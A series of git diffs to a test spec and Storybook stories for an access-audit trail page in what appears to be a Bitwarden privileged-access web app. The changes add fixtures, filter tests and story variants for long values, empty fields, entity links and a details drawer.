+
+  it("clears the inverted-range error once the bounds are the right way round", async () => {
+    auditApiService.listAccessAuditTrail.mockResolvedValue([event()]);
+
+    fixture.detectChanges();
+    await fixture.whenStable();
+    fixture.detectChanges();
+
+    component().fromControl.setValue("2026-08-01T00:00");
+    component().toControl.setValue("2026-07-01T00:00");
+    fixture.detectChanges();
+
+    component().toControl.setValue("2026-09-01T00:00");
+    fixture.detectChanges();
+
+    const toInput = fixture.nativeElement.querySelector("#access-audit_input_to");
+    expect(toInput.closest("bit-form-field").querySelector("bit-error")).toBeNull();
+    expect(toInput.getAttribute("aria-invalid")).not.toBe("true");
+    expect(component().toControl.errors).toBeNull();
   });
 
   // Every filter is a predicate over the one already-fetched window; the endpoint takes no query

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -743,10 +743,11 @@ describe("AccessAuditComponent", () => {
 
   describe("item filter", () => {
     /** The Item cell renders locally-decrypted cipher names, so the chip's options follow the resolver. */
-    const withCiphers = (names: [string, string][]) => {
+    const withCiphers = (names: [string, string][], collections: [string, string][] = []) => {
       nameResolver.resolveNames.mockResolvedValue({
         ...emptyResolvedNames(),
         cipherNameById: new Map(names),
+        collectionNameById: new Map(collections),
       });
     };
 
@@ -815,6 +816,30 @@ describe("AccessAuditComponent", () => {
 
       expect(component().filteredRows()).toHaveLength(1);
       expect(component().filteredRows()[0].cipherName).toBe("Prod database");
+    });
+
+    // The Actor chip qualifies a shared display name with the identity's email; the collection is the
+    // equivalent an item carries, and the Item cell already shows it as that name's tooltip.
+    it("tells apart two items that share a name", async () => {
+      withCiphers(
+        [
+          ["cipher-1", "Database"],
+          ["cipher-2", "Database"],
+        ],
+        [
+          ["col-1", "production"],
+          ["col-2", "staging"],
+        ],
+      );
+      await render([
+        event({ CipherId: "cipher-1", CollectionId: "col-1" }),
+        event({ CipherId: "cipher-2", CollectionId: "col-2" }),
+      ]);
+
+      expect(component().itemOptions()).toEqual([
+        { label: "Database (production)", value: "cipher-1" },
+        { label: "Database (staging)", value: "cipher-2" },
+      ]);
     });
 
     // Two access rules can carry the same name; filtering on the id keeps their histories apart.

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.spec.ts
@@ -1593,8 +1593,7 @@ describe("AccessAuditComponent", () => {
       expect(cell().textContent!.trim()).toBe(medium);
     });
 
-    // The tooltip existed only to recover what `short` left out; a cell that shows the whole
-    // timestamp has nothing left to reveal on hover.
+    // The cell renders the whole timestamp, so a hover has nothing left to reveal.
     it("carries nothing to hover over", async () => {
       await renderRow();
 

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -161,6 +161,47 @@ const EVENTS: AccessAuditEventResponse[] = [
   }),
 ];
 
+/**
+ * Item and Detail both render unbounded free text, so the column widths only hold up under values
+ * long enough to fight for room. These three are the shapes that broke the layout: a rule name well
+ * past sixty characters, a full-sentence detail, and a single token longer than the column cap —
+ * which has to break mid-word rather than push the table wider than the page.
+ */
+const LONG_TEXT_EVENTS: AccessAuditEventResponse[] = [
+  event({
+    kind: AccessAuditEventKind.RuleDeleted,
+    occurredAt: fromNow(-10 * MINUTE),
+    cipherId: null,
+    collectionId: null,
+    requestId: null,
+    ruleId: "rule-2",
+    ruleName:
+      "Emergency database credential rotation access for the platform reliability engineering on-call team",
+    ...APPROVER,
+  }),
+  event({
+    kind: AccessAuditEventKind.LeaseRevoked,
+    occurredAt: fromNow(-30 * MINUTE),
+    leaseId: "lease-3",
+    ...APPROVER,
+    detail:
+      "Revoked ahead of the scheduled expiry after the on-call engineer confirmed the primary replica had recovered and the failover procedure completed without needing the elevated credential.",
+  }),
+  event({
+    kind: AccessAuditEventKind.RequestDenied,
+    occurredAt: fromNow(-90 * MINUTE),
+    cipherId: null,
+    collectionId: null,
+    requestId: null,
+    ruleId: "rule-3",
+    ruleName:
+      "https://runbooks.internal.example.com/database/emergency-credential-rotation-procedure-v4-approved-2026",
+    ...APPROVER,
+    detail:
+      "correlationid=AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT",
+  }),
+];
+
 function audit(options: { events?: AccessAuditEventResponse[]; fails?: boolean } = {}) {
   const { events = EVENTS, fails = false } = options;
   return moduleMetadata({
@@ -233,6 +274,15 @@ export const LoadError: Story = {
 /** A single event — the trail right after an organization's first request. */
 export const SingleEvent: Story = {
   decorators: [audit({ events: [EVENTS[EVENTS.length - 2]] })],
+};
+
+/**
+ * The width check. Time and Event hold on one line beside Item and Detail values long enough to
+ * wrap, and the over-long token breaks inside its column — so the table stays within the page
+ * instead of dragging a horizontal scrollbar onto it.
+ */
+export const LongValues: Story = {
+  decorators: [audit({ events: [...LONG_TEXT_EVENTS, ...EVENTS] })],
 };
 
 /**

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -2,7 +2,7 @@ import { importProvidersFrom } from "@angular/core";
 import { ActivatedRoute, RouterModule } from "@angular/router";
 import { Meta, StoryObj, applicationConfig, moduleMetadata } from "@storybook/angular";
 import { of } from "rxjs";
-import { fireEvent } from "storybook/test";
+import { fireEvent, userEvent, within } from "storybook/test";
 
 import { OrganizationUserApiService } from "@bitwarden/admin-console/common";
 import { OrganizationService } from "@bitwarden/common/admin-console/abstractions/organization/organization.service.abstraction";
@@ -17,6 +17,7 @@ import {
   HOUR,
   MINUTE,
   fromNow,
+  liveFromNow,
   provideStoryChangeDetection,
   provideStoryLogService,
   storyNames,
@@ -279,6 +280,53 @@ const MIXED_LINK_EVENTS: AccessAuditEventResponse[] = [
   }),
 ];
 
+/**
+ * A trail stamped against the REAL clock, for the stories that exercise the Time period presets. The
+ * presets are measured from `Date.now()`, so a {@link fromNow} fixture — anchored to a fixed past
+ * instant — would fall outside every window and leave those stories showing an empty table forever.
+ */
+function liveEvents(): AccessAuditEventResponse[] {
+  return [
+    event({ kind: AccessAuditEventKind.CredentialAccessed, occurredAt: liveFromNow(-HOUR) }),
+    event({
+      kind: AccessAuditEventKind.LeaseRevoked,
+      occurredAt: liveFromNow(-2 * DAY),
+      leaseId: "lease-2",
+      ...APPROVER,
+      detail: "Incident closed early.",
+    }),
+    event({
+      kind: AccessAuditEventKind.RequestApproved,
+      occurredAt: liveFromNow(-20 * DAY),
+      cipherId: "cipher-2",
+      collectionId: "col-2",
+      ...OTHER_REQUESTER,
+    }),
+    event({
+      kind: AccessAuditEventKind.RequestSubmitted,
+      occurredAt: liveFromNow(-60 * DAY),
+      cipherId: "cipher-3",
+      ...OTHER_REQUESTER,
+    }),
+  ];
+}
+
+/**
+ * Picks an option from one of the filter chips, found by the label its trigger carries. The chip's menu
+ * renders in a CDK overlay on `document.body`, outside the story's own canvas.
+ */
+async function selectChipOption(
+  canvasElement: HTMLElement,
+  chip: string,
+  option: string,
+): Promise<void> {
+  const trigger = canvasElement.querySelector<HTMLButtonElement>(
+    `bit-filter-menu button[title^="${chip}"]`,
+  )!;
+  await userEvent.click(trigger);
+  await userEvent.click(await within(document.body).findByText(option));
+}
+
 function audit(
   options: {
     events?: AccessAuditEventResponse[];
@@ -411,14 +459,38 @@ export const Refreshing: Story = {
 };
 
 /**
- * A filter that matches nothing — a From bound later than every event in the trail. Export is disabled
- * alongside the no-matches callout: the file follows the filtered table, so with nothing on screen there is
- * nothing to download.
+ * A filter that matches nothing — Today over a trail whose newest event is older than that. Export is
+ * disabled alongside the no-matches callout: the file follows the filtered table, so with nothing on screen
+ * there is nothing to download. Clear all sits at the end of the chip row, which is the way back.
  */
 export const NoMatches: Story = {
   decorators: [audit()],
   play: async ({ canvasElement }) => {
-    const from = canvasElement.querySelector<HTMLInputElement>("#access-audit_input_from")!;
-    await fireEvent.input(from, { target: { value: "2999-01-01T00:00" } });
+    await selectChipOption(canvasElement, "Time period", "Today");
+  },
+};
+
+/**
+ * A preset in force. The Time period chip carries its selection the way the other three carry theirs —
+ * same height, same pressed styling, same dismiss — so the row reads as one family of controls, and the
+ * table is narrowed to the events inside the window rather than the whole fetched trail.
+ */
+export const TimePeriodFiltered: Story = {
+  decorators: [audit({ events: liveEvents() })],
+  play: async ({ canvasElement }) => {
+    await selectChipOption(canvasElement, "Time period", "Past 7 days");
+  },
+};
+
+/**
+ * Two chips narrowed at once, which is where Clear all earns its place: it is the only affordance that
+ * undoes them in one move. The actions sit on their own row above, so a chip label long enough to wrap
+ * the row can never orphan Export onto a line of its own.
+ */
+export const FiltersActive: Story = {
+  decorators: [audit({ events: liveEvents() })],
+  play: async ({ canvasElement }) => {
+    await selectChipOption(canvasElement, "Time period", "Past 30 days");
+    await selectChipOption(canvasElement, "Event", "Request approved");
   },
 };

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -4,9 +4,11 @@ import { Meta, StoryObj, applicationConfig, moduleMetadata } from "@storybook/an
 import { of } from "rxjs";
 import { fireEvent } from "storybook/test";
 
+import { OrganizationUserApiService } from "@bitwarden/admin-console/common";
 import { OrganizationService } from "@bitwarden/common/admin-console/abstractions/organization/organization.service.abstraction";
 import { AccountService } from "@bitwarden/common/auth/abstractions/account.service";
 import { FileDownloadService } from "@bitwarden/common/platform/abstractions/file-download/file-download.service";
+import { DialogService } from "@bitwarden/components";
 import { PreloadedEnglishI18nModule } from "@bitwarden/web-vault/app/core/tests";
 
 import { AccessNameResolverService } from "../access-requests/access-name-resolver.service";
@@ -202,8 +204,89 @@ const LONG_TEXT_EVENTS: AccessAuditEventResponse[] = [
   }),
 ];
 
-function audit(options: { events?: AccessAuditEventResponse[]; fails?: boolean } = {}) {
-  const { events = EVENTS, fails = false } = options;
+/**
+ * The organization's members as `getAllMiniUserDetails` returns them, keyed by platform user id and
+ * carrying the organization user id the entity-events dialog needs.
+ *
+ * Deliberately short of the identities the trail names: `user-9` acted while a member and has since been
+ * removed, so that row's actor and requester stay plain text however the rest of the table links.
+ */
+const MEMBERS = [
+  { userId: "user-1", id: "org-user-1", name: "Grace Hopper", email: "grace@example.com" },
+  { userId: "user-2", id: "org-user-2", name: "Ada Lovelace", email: "ada@example.com" },
+  { userId: "user-3", id: "org-user-3", name: "Katherine Johnson", email: "katherine@example.com" },
+];
+
+/** An identity the member lookup cannot resolve — a member who has since left the organization. */
+const FORMER_MEMBER = {
+  actorId: "user-9",
+  actorName: "Alan Turing",
+  actorEmail: "alan@example.com",
+  requesterId: "user-9",
+  requesterName: "Alan Turing",
+  requesterEmail: "alan@example.com",
+};
+
+/**
+ * The linkability check. Every cell that must NOT become an anchor sits beside one that must, so a
+ * regression that links everything is as visible as one that links nothing: the automated row's System
+ * actor, a former member's name, an access rule (which has no entity-events dialog), and an item that
+ * did not decrypt in this viewer's vault.
+ */
+const MIXED_LINK_EVENTS: AccessAuditEventResponse[] = [
+  // Every cell linkable: a resolved actor, a resolved requester, and an item this vault decrypted.
+  event({
+    kind: AccessAuditEventKind.CredentialAccessed,
+    occurredAt: fromNow(-5 * MINUTE),
+    ...APPROVER,
+  }),
+  // Automated: the Actor cell reads System, which is not a member and never a link.
+  event({
+    kind: AccessAuditEventKind.LeaseExpired,
+    occurredAt: fromNow(-15 * MINUTE),
+    leaseId: "lease-1",
+    actorId: null,
+    actorName: null,
+    actorEmail: null,
+    automated: true,
+  }),
+  // A former member: both names resolve to nothing the lookup knows, so both stay text.
+  event({
+    kind: AccessAuditEventKind.RequestSubmitted,
+    occurredAt: fromNow(-40 * MINUTE),
+    ...FORMER_MEMBER,
+  }),
+  // A rule change: the Item cell falls back to the rule name, which has no event history to open.
+  event({
+    kind: AccessAuditEventKind.RuleUpdated,
+    occurredAt: fromNow(-3 * HOUR),
+    cipherId: null,
+    collectionId: null,
+    requestId: null,
+    ruleId: "rule-1",
+    ruleName: "Production access",
+    ...APPROVER,
+  }),
+  // An item outside this viewer's vault: no decrypted name, so nothing to render as link text.
+  event({
+    kind: AccessAuditEventKind.RequestApproved,
+    occurredAt: fromNow(-DAY),
+    cipherId: "cipher-9",
+    collectionId: "col-9",
+    requestId: "req-9",
+    ...OTHER_REQUESTER,
+    ...APPROVER,
+  }),
+];
+
+function audit(
+  options: {
+    events?: AccessAuditEventResponse[];
+    fails?: boolean;
+    membersRefused?: boolean;
+  } = {},
+) {
+  const { events = EVENTS, fails = false, membersRefused = false } = options;
   return moduleMetadata({
     imports: [AccessAuditComponent],
     providers: [
@@ -218,6 +301,16 @@ function audit(options: { events?: AccessAuditEventResponse[]; fails?: boolean }
         provide: AccessNameResolverService,
         useValue: { resolveNames: () => Promise.resolve(names) },
       },
+      {
+        provide: OrganizationUserApiService,
+        useValue: {
+          getAllMiniUserDetails: () =>
+            membersRefused
+              ? Promise.reject(new Error("member listing refused"))
+              : Promise.resolve({ data: MEMBERS }),
+        },
+      },
+      { provide: DialogService, useValue: { open: () => ({ closed: of(undefined) }) } },
       {
         provide: FileDownloadService,
         useValue: { download: (): void => undefined },
@@ -283,6 +376,24 @@ export const SingleEvent: Story = {
  */
 export const LongValues: Story = {
   decorators: [audit({ events: [...LONG_TEXT_EVENTS, ...EVENTS] })],
+};
+
+/**
+ * Which cells open an event history and which do not. The actor, requester and item of the top row are
+ * all anchors; beside them sit the four that must stay plain text — the System actor, a former member's
+ * name, an access rule, and an item this viewer's vault could not decrypt.
+ */
+export const EntityLinks: Story = {
+  decorators: [audit({ events: MIXED_LINK_EVENTS })],
+};
+
+/**
+ * The member lookup refused. `AccessEventLogs` authorizes this trail but does not imply permission to
+ * enumerate the organization's members, so this is what a legitimate viewer without that second
+ * permission sees: the whole trail, with every name plain text and only the item still linked.
+ */
+export const MemberLookupRefused: Story = {
+  decorators: [audit({ events: MIXED_LINK_EVENTS, membersRefused: true })],
 };
 
 /**

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -325,6 +325,9 @@ async function selectChipOption(
   )!;
   await userEvent.click(trigger);
   await userEvent.click(await within(document.body).findByText(option));
+  // A multi-select menu stays open so more options can be picked; close it before the next chip is
+  // reached for, or the click lands on this menu's backdrop instead of that chip.
+  await userEvent.keyboard("{Escape}");
 }
 
 function audit(

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -283,16 +283,10 @@ function audit(
   options: {
     events?: AccessAuditEventResponse[];
     fails?: boolean;
-    membersRefused?: boolean;
     refreshPending?: boolean;
   } = {},
 ) {
-  const {
-    events = EVENTS,
-    fails = false,
-    membersRefused = false,
-    refreshPending = false,
-  } = options;
+  const { events = EVENTS, fails = false, refreshPending = false } = options;
   return moduleMetadata({
     imports: [AccessAuditComponent],
     providers: [
@@ -322,10 +316,7 @@ function audit(
       {
         provide: OrganizationUserApiService,
         useValue: {
-          getAllMiniUserDetails: () =>
-            membersRefused
-              ? Promise.reject(new Error("member listing refused"))
-              : Promise.resolve({ data: MEMBERS }),
+          getAllMiniUserDetails: () => Promise.resolve({ data: MEMBERS }),
         },
       },
       { provide: DialogService, useValue: { open: () => ({ closed: of(undefined) }) } },
@@ -403,15 +394,6 @@ export const LongValues: Story = {
  */
 export const EntityLinks: Story = {
   decorators: [audit({ events: MIXED_LINK_EVENTS })],
-};
-
-/**
- * The member lookup refused. `AccessEventLogs` authorizes this trail but does not imply permission to
- * enumerate the organization's members, so this is what a legitimate viewer without that second
- * permission sees: the whole trail, with every name plain text and only the item still linked.
- */
-export const MemberLookupRefused: Story = {
-  decorators: [audit({ events: MIXED_LINK_EVENTS, membersRefused: true })],
 };
 
 /**

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -281,6 +281,68 @@ const MIXED_LINK_EVENTS: AccessAuditEventResponse[] = [
 ];
 
 /**
+ * The absence check. Every cell that can carry no value carries none here, so the five that render an em
+ * dash — actor, requester, item, duration, detail — line up in one look beside the one absence that is not
+ * one: the automated row's Actor cell, which reads System because that IS the value.
+ */
+const EMPTY_FIELD_EVENTS: AccessAuditEventResponse[] = [
+  // Nothing but a time and a kind: no actor, no requester, no item, no duration, no detail.
+  event({
+    kind: AccessAuditEventKind.LeasingFreezeEnabled,
+    occurredAt: fromNow(-5 * MINUTE),
+    actorId: null,
+    actorName: null,
+    actorEmail: null,
+    requesterId: null,
+    requesterName: null,
+    requesterEmail: null,
+    cipherId: null,
+    collectionId: null,
+    requestId: null,
+  }),
+  // Automated with nothing else: the Actor cell reads System while the rest of the row dashes.
+  event({
+    kind: AccessAuditEventKind.LeaseExpired,
+    occurredAt: fromNow(-25 * MINUTE),
+    leaseId: "lease-4",
+    actorId: null,
+    actorName: null,
+    actorEmail: null,
+    requesterId: null,
+    requesterName: null,
+    requesterEmail: null,
+    cipherId: null,
+    collectionId: null,
+    requestId: null,
+    automated: true,
+  }),
+  // An actor but no requester: a rule change nobody asked for, and no comment recorded against it.
+  event({
+    kind: AccessAuditEventKind.RuleCreated,
+    occurredAt: fromNow(-2 * HOUR),
+    cipherId: null,
+    collectionId: null,
+    requestId: null,
+    ruleId: "rule-4",
+    ruleName: "Production access",
+    requesterId: null,
+    requesterName: null,
+    requesterEmail: null,
+    ...APPROVER,
+  }),
+  // A full row beside them, so a regression that dashes a value is as visible as one that blanks an absence.
+  event({
+    kind: AccessAuditEventKind.LeaseActivated,
+    occurredAt: fromNow(-3 * HOUR),
+    leaseId: "lease-5",
+    leaseNotBefore: fromNow(-3 * HOUR),
+    leaseNotAfter: fromNow(-HOUR),
+    ...APPROVER,
+    detail: "Approved for the incident window.",
+  }),
+];
+
+/**
  * A trail stamped against the REAL clock, for the stories that exercise the Time period presets. The
  * presets are measured from `Date.now()`, so a {@link fromNow} fixture — anchored to a fixed past
  * instant — would fall outside every window and leave those stories showing an empty table forever.
@@ -459,6 +521,15 @@ export const Refreshing: Story = {
     const update = canvasElement.querySelector<HTMLButtonElement>("#access-audit_button_refresh")!;
     await fireEvent.click(update);
   },
+};
+
+/**
+ * Absence, rendered the one way. Actor, Requester, Item, Duration and Detail each render the same muted em
+ * dash where the trail carries no value, so a reader can tell "we have no value for this" from a cell that
+ * failed to render — while the automated row keeps its System actor, which is a value rather than an absence.
+ */
+export const EmptyFields: Story = {
+  decorators: [audit({ events: EMPTY_FIELD_EVENTS })],
 };
 
 /**

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -165,10 +165,11 @@ const EVENTS: AccessAuditEventResponse[] = [
 ];
 
 /**
- * Item and Detail both render unbounded free text, so the column widths only hold up under values
- * long enough to fight for room. These three are the shapes that broke the layout: a rule name well
- * past sixty characters, a full-sentence detail, and a single token longer than the column cap —
- * which has to break mid-word rather than push the table wider than the page.
+ * Item renders unbounded free text, so the column widths only hold up under values long enough to
+ * fight for room. These three are the shapes that broke the layout: a rule name well past sixty
+ * characters, and a single token longer than the column cap — which has to break mid-word rather
+ * than push the table wider than the page. Their details, now the drawer's, are carried along so
+ * the pane behind them has something long to lay out too.
  */
 const LONG_TEXT_EVENTS: AccessAuditEventResponse[] = [
   event({
@@ -281,8 +282,8 @@ const MIXED_LINK_EVENTS: AccessAuditEventResponse[] = [
 ];
 
 /**
- * The absence check. Every cell that can carry no value carries none here, so the five that render an em
- * dash — actor, requester, item, duration, detail — line up in one look beside the one absence that is not
+ * The absence check. Every cell that can carry no value carries none here, so the four that render an em
+ * dash — actor, requester, item, duration — line up in one look beside the one absence that is not
  * one: the automated row's Actor cell, which reads System because that IS the value.
  */
 const EMPTY_FIELD_EVENTS: AccessAuditEventResponse[] = [
@@ -432,7 +433,13 @@ function audit(
           getAllMiniUserDetails: () => Promise.resolve({ data: MEMBERS }),
         },
       },
-      { provide: DialogService, useValue: { open: () => ({ closed: of(undefined) }) } },
+      {
+        provide: DialogService,
+        useValue: {
+          open: () => ({ closed: of(undefined) }),
+          openDrawer: () => Promise.resolve(undefined),
+        },
+      },
       {
         provide: FileDownloadService,
         useValue: { download: (): void => undefined },
@@ -492,9 +499,9 @@ export const SingleEvent: Story = {
 };
 
 /**
- * The width check. Time and Event hold on one line beside Item and Detail values long enough to
- * wrap, and the over-long token breaks inside its column — so the table stays within the page
- * instead of dragging a horizontal scrollbar onto it.
+ * The width check. Timestamp and Event hold on one line beside Item values long enough to wrap, and
+ * the over-long token breaks inside its column — so the table stays within the page instead of
+ * dragging a horizontal scrollbar onto it.
  */
 export const LongValues: Story = {
   decorators: [audit({ events: [...LONG_TEXT_EVENTS, ...EVENTS] })],
@@ -524,8 +531,8 @@ export const Refreshing: Story = {
 };
 
 /**
- * Absence, rendered the one way. Actor, Requester, Item, Duration and Detail each render the same muted em
- * dash where the trail carries no value, so a reader can tell "we have no value for this" from a cell that
+ * Absence, rendered the one way. Actor, Requester, Item and Duration each render the same muted em dash
+ * where the trail carries no value, so a reader can tell "we have no value for this" from a cell that
  * failed to render — while the automated row keeps its System actor, which is a value rather than an absence.
  */
 export const EmptyFields: Story = {

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -1,7 +1,7 @@
 import { importProvidersFrom } from "@angular/core";
 import { ActivatedRoute, RouterModule } from "@angular/router";
 import { Meta, StoryObj, applicationConfig, moduleMetadata } from "@storybook/angular";
-import { of } from "rxjs";
+import { NEVER, of } from "rxjs";
 import { fireEvent, userEvent, within } from "storybook/test";
 
 import { OrganizationUserApiService } from "@bitwarden/admin-console/common";
@@ -398,9 +398,15 @@ function audit(
     events?: AccessAuditEventResponse[];
     fails?: boolean;
     refreshPending?: boolean;
+    drawerStaysOpen?: boolean;
   } = {},
 ) {
-  const { events = EVENTS, fails = false, refreshPending = false } = options;
+  const {
+    events = EVENTS,
+    fails = false,
+    refreshPending = false,
+    drawerStaysOpen = false,
+  } = options;
   return moduleMetadata({
     imports: [AccessAuditComponent],
     providers: [
@@ -437,7 +443,10 @@ function audit(
         provide: DialogService,
         useValue: {
           open: () => ({ closed: of(undefined) }),
-          openDrawer: () => Promise.resolve(undefined),
+          // A ref whose `closed` never emits is a drawer that stays open, which is what the page
+          // reads to decide how many columns the table can hold.
+          openDrawer: () =>
+            Promise.resolve(drawerStaysOpen ? { closed: NEVER, isDrawer: true } : undefined),
         },
       },
       {
@@ -505,6 +514,24 @@ export const SingleEvent: Story = {
  */
 export const LongValues: Story = {
   decorators: [audit({ events: [...LONG_TEXT_EVENTS, ...EVENTS] })],
+};
+
+/**
+ * The table with the details drawer open. Actor, Requester and Duration stand down — the pane shows all
+ * three for the selected row anyway — leaving Timestamp, Event and Item, which is what an auditor needs
+ * to keep their place and step to the next row.
+ *
+ * The story mounts the page on its own, so there is no layout to render the pane in and nothing beside
+ * the table; the narrow wrapper stands in for the width the drawer would leave, and the drawer itself is
+ * a ref that never closes. What this shows is the column set and the fit, not the pane.
+ */
+export const DetailsDrawerOpen: Story = {
+  decorators: [audit({ events: [...LONG_TEXT_EVENTS, ...EVENTS], drawerStaysOpen: true })],
+  render: () => ({ template: `<div class="tw-max-w-3xl"><app-pam-access-audit /></div>` }),
+  play: async ({ canvasElement }) => {
+    const row = canvasElement.querySelector<HTMLElement>("#access-audit_button_details-0")!;
+    await userEvent.click(row);
+  },
 };
 
 /**

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -533,9 +533,10 @@ export const EmptyFields: Story = {
 };
 
 /**
- * A filter that matches nothing — Today over a trail whose newest event is older than that. Export is
- * disabled alongside the no-matches callout: the file follows the filtered table, so with nothing on screen
- * there is nothing to download. Clear all sits at the end of the chip row, which is the way back.
+ * A filter that matches nothing — Today over a trail whose newest event is older than that. The standard
+ * empty state, the same shape a trail with no events at all gets, rather than a callout: an over-narrow
+ * filter is an ordinary outcome, not a warning. Export is disabled alongside it, the file following the
+ * filtered table, and Clear all sits inside the empty state as well as at the end of the chip row.
  */
 export const NoMatches: Story = {
   decorators: [audit()],

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -284,17 +284,35 @@ function audit(
     events?: AccessAuditEventResponse[];
     fails?: boolean;
     membersRefused?: boolean;
+    refreshPending?: boolean;
   } = {},
 ) {
-  const { events = EVENTS, fails = false, membersRefused = false } = options;
+  const {
+    events = EVENTS,
+    fails = false,
+    membersRefused = false,
+    refreshPending = false,
+  } = options;
   return moduleMetadata({
     imports: [AccessAuditComponent],
     providers: [
       {
         provide: AuditApiService,
-        useValue: {
-          listAccessAuditTrail: () =>
-            fails ? Promise.reject(new Error("audit read failed")) : Promise.resolve(events),
+        // A factory rather than a value so the read counter behind `refreshPending` starts again on
+        // every mount of the story, instead of once for the lifetime of the module.
+        useFactory: () => {
+          let reads = 0;
+          return {
+            listAccessAuditTrail: () => {
+              reads += 1;
+              if (fails) {
+                return Promise.reject(new Error("audit read failed"));
+              }
+              return refreshPending && reads > 1
+                ? new Promise<AccessAuditEventResponse[]>(() => undefined)
+                : Promise.resolve(events);
+            },
+          };
         },
       },
       {
@@ -394,6 +412,20 @@ export const EntityLinks: Story = {
  */
 export const MemberLookupRefused: Story = {
   decorators: [audit({ events: MIXED_LINK_EVENTS, membersRefused: true })],
+};
+
+/**
+ * A refresh in flight. The trail is already live under every filter, so Update exists only to pull in what
+ * the server has recorded since the page opened — and for as long as that read takes, the table, the chips
+ * and the date range all stay exactly where the auditor left them, behind nothing but the button's own
+ * pending state.
+ */
+export const Refreshing: Story = {
+  decorators: [audit({ refreshPending: true })],
+  play: async ({ canvasElement }) => {
+    const update = canvasElement.querySelector<HTMLButtonElement>("#access-audit_button_refresh")!;
+    await fireEvent.click(update);
+  },
 };
 
 /**

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -2,9 +2,11 @@ import { importProvidersFrom } from "@angular/core";
 import { ActivatedRoute, RouterModule } from "@angular/router";
 import { Meta, StoryObj, applicationConfig, moduleMetadata } from "@storybook/angular";
 import { of } from "rxjs";
+import { userEvent } from "storybook/test";
 
 import { OrganizationService } from "@bitwarden/common/admin-console/abstractions/organization/organization.service.abstraction";
 import { AccountService } from "@bitwarden/common/auth/abstractions/account.service";
+import { FileDownloadService } from "@bitwarden/common/platform/abstractions/file-download/file-download.service";
 import { PreloadedEnglishI18nModule } from "@bitwarden/web-vault/app/core/tests";
 
 import { AccessNameResolverService } from "../access-requests/access-name-resolver.service";
@@ -176,6 +178,10 @@ function audit(options: { events?: AccessAuditEventResponse[]; fails?: boolean }
         useValue: { resolveNames: () => Promise.resolve(names) },
       },
       {
+        provide: FileDownloadService,
+        useValue: { download: (): void => undefined },
+      },
+      {
         provide: ActivatedRoute,
         useValue: { params: of({ organizationId: "org-1" }), data: of({}) },
       },
@@ -227,4 +233,16 @@ export const LoadError: Story = {
 /** A single event — the trail right after an organization's first request. */
 export const SingleEvent: Story = {
   decorators: [audit({ events: [EVENTS[EVENTS.length - 2]] })],
+};
+
+/**
+ * A search that matches nothing. Export is disabled alongside the no-matches callout: the file follows the
+ * filtered table, so with nothing on screen there is nothing to download.
+ */
+export const NoMatches: Story = {
+  decorators: [audit()],
+  play: async ({ canvasElement }) => {
+    const search = canvasElement.querySelector<HTMLInputElement>('input[name="searchText"]')!;
+    await userEvent.type(search, "nothing matches this");
+  },
 };

--- a/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
+++ b/bitwarden_license/bit-web/src/app/pam/access-audit/access-audit.component.stories.ts
@@ -52,29 +52,48 @@ function event(overrides: Record<string, unknown>): AccessAuditEventResponse {
     leaseNotAfter: null,
     cipherName: null,
     collectionName: null,
+    ruleName: null,
+    automated: false,
+    incomplete: false,
     ...overrides,
   } as unknown as AccessAuditEventResponse;
 }
 
-/** One of each kind the trail actually emits today, newest first as the server returns them. */
+/** The approver, distinct from the two requesters so the Actor and Requester chips each have something to sort. */
+const APPROVER = {
+  actorId: "user-2",
+  actorName: "Ada Lovelace",
+  actorEmail: "ada@example.com",
+};
+
+/** The second requester, so the Requester chip is not a one-option menu. */
+const OTHER_REQUESTER = {
+  requesterId: "user-3",
+  requesterName: "Katherine Johnson",
+  requesterEmail: "katherine@example.com",
+};
+
+/**
+ * One of each kind the trail actually emits today, newest first as the server returns them, spread
+ * over a week so the date range has something to narrow.
+ */
 const EVENTS: AccessAuditEventResponse[] = [
   event({
     kind: AccessAuditEventKind.LeaseExpired,
     occurredAt: fromNow(-5 * MINUTE),
     leaseId: "lease-1",
+    // No actor: the lease ran out on its own, which the row renders as an automated action.
+    actorId: null,
+    actorName: null,
+    actorEmail: null,
+    automated: true,
   }),
   event({
     kind: AccessAuditEventKind.LeaseRevoked,
     occurredAt: fromNow(-20 * MINUTE),
     leaseId: "lease-2",
